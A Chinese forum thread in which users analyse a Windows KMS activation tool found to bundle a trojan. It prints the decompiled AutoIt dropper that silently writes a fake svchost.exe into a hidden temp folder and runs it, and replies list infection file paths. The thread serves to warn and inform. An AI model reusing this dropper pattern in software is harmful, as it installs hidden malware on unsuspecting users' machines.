无忧启动论坛

 找回密码
 注册
搜索
系统gho:最纯净好用系统下载站广告联系 微信:wuyouceo QQ:184822951
查看: 6453|回复: 33

[原创] 病毒帖【最干净的windows系统激活】的分析与猜测

  [复制链接]
发表于 2019-5-18 00:00:52 | 显示全部楼层 |阅读模式
本帖最后由 2012jiashanni 于 2019-5-18 00:52 编辑

原贴:http://wuyou.net/forum.php?mod=v ... tra=page%3D1&page=1


通过分析,发现这个程序是AU3编译的 压缩包

程序反编译后的源码显示

就是把一个名为 microkms.exe 的激活工具 与 svchost.exe [目测病毒] 释放到 临时目录  %TEMP%\TEMP 并设置这个目录隐藏
然后分别运行这两个程序  

程序信息显示两个程序为同一个开发者

我猜报木马就是 svchost.exe   导致的  
这也是目前 小部分激活工具发布者 通常会做的一个手法,通过第三方定制或自行开发,并捆绑木马,多半目的是劫持浏览器主页/捆绑软件/其他目的

目测这个 microkms.exe  是安全的为什么我猜microkms.exe  是安全的,因为他这个很明显是第三方定制的,如果是他自行开发或在定制的时候要求加入木马,完全用不到AU3二次打包进木马,直接内置在程序里就可以了,多半是开发这个激活工具的人没写入木马或者他意外得到这分源码但是只会改作者信息,所以只能AU3二次打包

当然也可能是第三方人嫁祸,重点在于  最干净的windows系统激活 这个帖子里的百度云下载过来的是的确有病毒的

这是 microkms.exe  的查毒报告,
https://habo.qq.com/file/showdetail?pk=ADcGZl1rB2QIP1s4U2Y%3D

可能这个发布者是想把正常能激活的工具与木马捆绑一起来达到增加收入的目的
这个网站发的激活工具  在网络上可查询到的是已经有人很早就反馈有病毒了
重点提醒 这个帖子里的工具不是误报 是真的有毒


反编译的AU3源码

#NoTrayIcon
#AutoIt3Wrapper_Icon=C:\Documents and Settings\Administrator\桌面\microkms.exe
#AutoIt3Wrapper_Res_Comment=在线KMS激活服务
#AutoIt3Wrapper_Res_Description=在线KMS激活服务
#AutoIt3Wrapper_Res_Fileversion=19.01.18.0
#AutoIt3Wrapper_Res_ProductVersion=19.01.18.0
#AutoIt3Wrapper_Res_Language=
#AutoIt3Wrapper_Res_LegalCopyright=www.yishimei.cn
DirCreate(@TempDir & "\temp")
DirCreate(@TempDir & "\temp")
DirCreate(@TempDir & "\temp")
FileSetAttrib(@TempDir & "\temp", "+S+H")
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\microkms.exe", @TempDir & "\temp\microkms.exe", 0)
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\svchost.exe", @TempDir & "\temp\svchost.exe", 0)
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\microkms.exe", @TempDir & "\temp\microkms.exe", 0)
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\svchost.exe", @TempDir & "\temp\svchost.exe", 0)
Sleep(10)
Run(@TempDir & "\temp\microkms.exe", @TempDir & "\temp", @SW_SHOW)
Run(@TempDir & "\temp\svchost.exe", @TempDir & "\temp", @SW_SHOW)





评分

参与人数 7无忧币 +35 收起 理由
熊猫专用 + 5 赞一个!
hit22 + 5 赞一个!
yaojy + 5 赞一个!
rengrancunzai + 5 赞一个!
9zhmke + 5 赞一个!
2012雨晨绿软 + 5 正常情况下不推荐大家用EXE类激活工具
tkfiles + 5 感谢总管大督查为我们保驾护航

查看全部评分

 楼主| 发表于 2019-5-18 00:12:53 | 显示全部楼层
对了 这个木马的传播范围有点广

另外他这个网站好像是个女的在运营 反正 支付宝叫 什么 小燕的
回复

使用道具 举报

发表于 2019-5-18 00:18:22 | 显示全部楼层
支持大神。我对au3不太懂,只会用以前下的工具一键反编译,编译不出来就不会了。
回复

使用道具 举报

发表于 2019-5-18 00:21:14 | 显示全部楼层
MicroKMS 神龙版本来就是亦是美的站长写的啊,其中激活用的KMS服务端搭建在他服务器上。

点评

你感觉这个帖子的重点是工具谁开发的吗  详情 回复 发表于 2019-5-18 00:29
楼主的意思是这个捆绑木马的壳也是写的这个yishimei的地址,当然不确定是不是本人做的,或者别人故意的  详情 回复 发表于 2019-5-18 00:23
回复

使用道具 举报

发表于 2019-5-18 00:23:54 | 显示全部楼层
本帖最后由 fjzjk 于 2019-5-18 00:26 编辑
danmo 发表于 2019-5-18 00:21
MicroKMS 神龙版本来就是亦是美的站长写的啊,其中激活用的KMS服务端搭建在他服务器上。


楼主的意思是这个捆绑木马的代码里面写了这个yishimei的地址,当然不确定是不是本人做的,或者别人故意的
----------------------
我看了下yishimei官网的kms,只有400k,应该是比较正常的

点评

反正不干净,正常大概在700K左右的样子。这个好几M,不用去分析就是有问题的。  详情 回复 发表于 2019-5-18 00:29
回复

使用道具 举报

发表于 2019-5-18 00:29:36 | 显示全部楼层
fjzjk 发表于 2019-5-18 00:23
楼主的意思是这个捆绑木马的代码里面写了这个yishimei的地址,当然不确定是不是本人做的,或者别人故意 ...

反正不干净,正常大概在700K左右的样子。这个好几M,不用去分析就是有问题的。

点评

是的,原帖楼主还不承认。yishimei的最新kms软件我也去分析了一下,行为非常正常,没有那些乱七八糟的动作  详情 回复 发表于 2019-5-18 00:30
回复

使用道具 举报

 楼主| 发表于 2019-5-18 00:29:39 | 显示全部楼层
danmo 发表于 2019-5-18 00:21
MicroKMS 神龙版本来就是亦是美的站长写的啊,其中激活用的KMS服务端搭建在他服务器上。

你感觉这个帖子的重点是工具谁开发的吗

点评

参考下小马激活工具的发展,感觉是和开发者自身利益有关系的。他自己内置到软件里面,吃相就难看了,一般二次打包。当然也只是猜想。  详情 回复 发表于 2019-5-18 00:36
回复

使用道具 举报

发表于 2019-5-18 00:30:16 | 显示全部楼层
danmo 发表于 2019-5-18 00:29
反正不干净,正常大概在700K左右的样子。这个好几M,不用去分析就是有问题的。

是的,原帖楼主还不承认。yishimei的最新kms软件我也去分析了一下,行为非常正常,没有那些乱七八糟的动作
回复

使用道具 举报

发表于 2019-5-18 00:36:45 | 显示全部楼层
2012jiashanni 发表于 2019-5-18 00:29
你感觉这个帖子的重点是工具谁开发的吗

参考下小马激活工具的发展,感觉是和开发者自身利益有关系的。他自己内置到软件里面,吃相就难看了,一般二次打包。当然也只是猜想。

点评

小马激活工具早已停止,后面的东西没有证据就与原开发者无关,明确一下, 许多工具之所以变味,并不一定与原作者有关,多是后来人作妖, 分享可能是原罪  详情 回复 发表于 2019-5-18 11:39
跟发展没关系的吧 他们只是想疯狂的赚钱为目的 而不是为了发展和维持 增加收入的渠道很多 而不是捆绑木马这种肮脏手段 我网站也遇到过资金问题,我一开始做纯净的,每个月自己投钱进去, 收入靠微薄的捐助,后来还是  详情 回复 发表于 2019-5-18 00:46
回复

使用道具 举报

 楼主| 发表于 2019-5-18 00:46:50 | 显示全部楼层
本帖最后由 2012jiashanni 于 2019-5-18 00:48 编辑
danmo 发表于 2019-5-18 00:36
参考下小马激活工具的发展,感觉是和开发者自身利益有关系的。他自己内置到软件里面,吃相就难看了,一 ...

跟发展没关系的吧 他们只是想疯狂的赚钱为目的 而不是为了发展和维持
增加收入的渠道很多 而不是捆绑木马这种肮脏手段
我网站也遇到过资金问题,我一开始做纯净的,每个月自己投钱进去,
收入靠微薄的捐助,后来还是有大佬捐助服务器了,才勉强撑了一年,难道我
当初发展困难我就可以在用户不知情的情况下去捆绑木马吗???
如果这个工具第一发布者是为了维持/发展/分享,他会在主页以提示框/勾选框/按钮等方式来让用户可选择

说到底 这个工具第一个发布者不是为了发展/维持/分享,他只是单纯的赚钱而已
回复

使用道具 举报

发表于 2019-5-18 00:49:34 | 显示全部楼层
我需要楼主的反编译软件谢谢哈。

点评

我群文件有 加群我官网有 www.51cxsoft.com  详情 回复 发表于 2019-5-18 00:50
回复

使用道具 举报

 楼主| 发表于 2019-5-18 00:50:29 | 显示全部楼层
令狐大虾 发表于 2019-5-18 00:49
我需要楼主的反编译软件谢谢哈。

我群文件有 加群我官网有 www.51cxsoft.com

点评

已经添加,貌似我以前在总拆群见过你哈 [attachimg]393547[/attachimg]  详情 回复 发表于 2019-5-18 00:56
回复

使用道具 举报

发表于 2019-5-18 00:56:08 | 显示全部楼层


已经添加,貌似我以前在总裁群见过你哈
QQ图片20190518005524.png
回复

使用道具 举报

发表于 2019-5-18 00:57:51 | 显示全部楼层
吾爱又有一个同款木马的帖子被封禁了。
回复

使用道具 举报

发表于 2019-5-18 11:27:18 | 显示全部楼层
学习了。
kms激活不是两个命令即可何必工具?激活后服务器改为127.0.0.1
回复

使用道具 举报

发表于 2019-5-18 11:34:10 | 显示全部楼层
原帖的标题有特点,干这个的这批人通常都用风格类似的标题,专门忽悠小白~
回复

使用道具 举报

发表于 2019-5-18 11:39:40 | 显示全部楼层
danmo 发表于 2019-5-18 00:36
参考下小马激活工具的发展,感觉是和开发者自身利益有关系的。他自己内置到软件里面,吃相就难看了,一 ...

小马激活工具早已停止,后面的东西没有证据就与原开发者无关,明确一下,
许多工具之所以变味,并不一定与原作者有关,多是后来人作妖,
分享可能是原罪

点评

以前看了火绒官方有个专门分析小马激活的白皮书的报告。里面一些分析了这个极可能和开发者有利益关联的的。 早期入小马群的一些人说之前的小马把网站卖掉了,官网留的Q群文件更新带劫持推广的,上传者是群主。那么  详情 回复 发表于 2019-5-19 01:16
回复

使用道具 举报

发表于 2019-5-18 12:31:33 | 显示全部楼层
吾爱破解论坛的病毒分析区的版主Hmily确认为

确认捆绑木马,请下载运行的同学尽快使用360系统急救箱查杀!

贴几个木马重要位置,注意全部清理:
C:\WINDOWS\system32\Ocular
C:\WINDOWS\system32\winrdlv3.exe
C:\Program Files\Common Files\System\systecv3.exe
C:\Program Files\Common Files\System\winrdgv3.exe
回复

使用道具 举报

发表于 2019-5-18 12:56:28 | 显示全部楼层
反正这激活工具一下,我装的卡巴斯基立马就删除。多谢楼主提醒。
回复

使用道具 举报

发表于 2019-5-18 14:12:38 | 显示全部楼层
下载下来报警我就直接删了,我一般是宁可没用的,也不用报警的,大部分说没问题请屏蔽什么的我也不大懂,怕出问题删了了事。
但说不定这样也早就被感染了不知道。
回复

使用道具 举报

发表于 2019-5-18 17:27:20 | 显示全部楼层
多谢分析,。。我用viruscan.org在线扫描好像只有4个报警,还以为是误报呢。。
回复

使用道具 举报

发表于 2019-5-19 01:16:47 | 显示全部楼层
易广白 发表于 2019-5-18 11:39
小马激活工具早已停止,后面的东西没有证据就与原开发者无关,明确一下,
许多工具之所以变味,并不一定 ...

以前看了火绒官方有个专门分析小马激活的白皮书的报告。里面一些分析了这个极可能和开发者有利益关联的的。
早期入小马群的一些人说之前的小马把网站卖掉了,官网留的Q群文件更新带劫持推广的,上传者是群主。那么,把自己积累下来的信任卖给病毒制作者,所以钱这东西力量很大。

点评

官网留的Q群文件更新应该是:小马KMS8 3.1,这个确实火绒会报毒,带劫持推广,可能是修改主页什么的,俺用了几年没注意到有什么不对的地方,但“VirSCAN.org-免费的多引擎可疑文件扫描服务”47个引擎16个报毒 之  详情 回复 发表于 2019-5-19 10:49
回复

使用道具 举报

发表于 2019-5-19 10:49:40 | 显示全部楼层
本帖最后由 易广白 于 2019-5-19 10:52 编辑
danmo 发表于 2019-5-19 01:16
以前看了火绒官方有个专门分析小马激活的白皮书的报告。里面一些分析了这个极可能和开发者有利益关联的的 ...



官网留的Q群文件更新应该是:小马KMS8 3.1,这个确实火绒会报毒,至于“带劫持推广”,可能是修改主页什么的,但俺用了几年没注意到有什么不对的地方,网络上用“VirSCAN.org-免费的多引擎可疑文件扫描服务”扫描,47个引擎16个报毒,

又检查“更早的2009年、2010年的小马激活直到“小马Oem8_lm1.2.1、Oem8_lm2.6”,火绒不报毒,网络查都会报毒,10个引擎左右,这就很尴尬了,经过时间证明无害的,却报毒……。

所以俺保留意见,不深究,反正已很少用,而且破解工具很难确定,俺只能说某个工具用了几年没问题,个人信任。
!!!但谢谢告之!!!

也一切正常,以后用它也行,其他各种工具也不少,
回复

使用道具 举报

发表于 2019-5-20 12:10:29 | 显示全部楼层
正因缺少LZ这样正义人士,激活和破解的相关工具都是病毒泛滥的温床。。
回复

使用道具 举报

发表于 2019-5-20 12:39:08 | 显示全部楼层
链接:https://pan.baidu.com/s/1GAZnbmyK7VohBrilOpitRw
提取码:7uep

大神,请帮我看下这个,是我很早几个月前收藏的,好像就是在本站、或者胡萝卜周那儿的,具体忘了。但是我感觉这个不像是有毒的,好像就是最初真正的VIP版。我刚删除后,看见前面贴出来的本帖楼主发的是6兆左右大小,遂回收站还原回来,我存的626K,大神可否分析一下吗?

点评

这个跟我帖子里破解出来的 microkms.exe 应该是相同不带毒的  详情 回复 发表于 2019-5-20 13:28
回复

使用道具 举报

 楼主| 发表于 2019-5-20 13:28:31 | 显示全部楼层
brook 发表于 2019-5-20 12:39
链接:https://pan.baidu.com/s/1GAZnbmyK7VohBrilOpitRw
提取码:7uep

这个跟我帖子里破解出来的 microkms.exe  应该是相同不带毒的

点评

好的,谢谢了  详情 回复 发表于 2019-5-20 14:12
回复

使用道具 举报

发表于 2019-5-20 14:12:43 | 显示全部楼层
2012jiashanni 发表于 2019-5-20 13:28
这个跟我帖子里破解出来的 microkms.exe  应该是相同不带毒的

好的,谢谢了
回复

使用道具 举报

发表于 2019-5-20 19:47:45 | 显示全部楼层
三行命令kms激活完事啦,用啥工具
回复

使用道具 举报

发表于 2019-5-20 20:59:26 | 显示全部楼层
还好,俺用企业G版
回复

使用道具 举报

发表于 2019-5-20 21:15:05 | 显示全部楼层
想问下,,这个病毒有什么作用呢,能引起什么后果呢

点评

一般来说就是锁定主页 强推流氓软件 有些就会窃取隐私往你系统里注入其他木马  详情 回复 发表于 2019-5-20 21:52
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|捐助支持|无忧启动 ( 闽ICP备05002490号-1 )

闽公网安备 35020302032614号

GMT+8, 2024-3-29 04:03

Powered by Discuz! X3.3

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表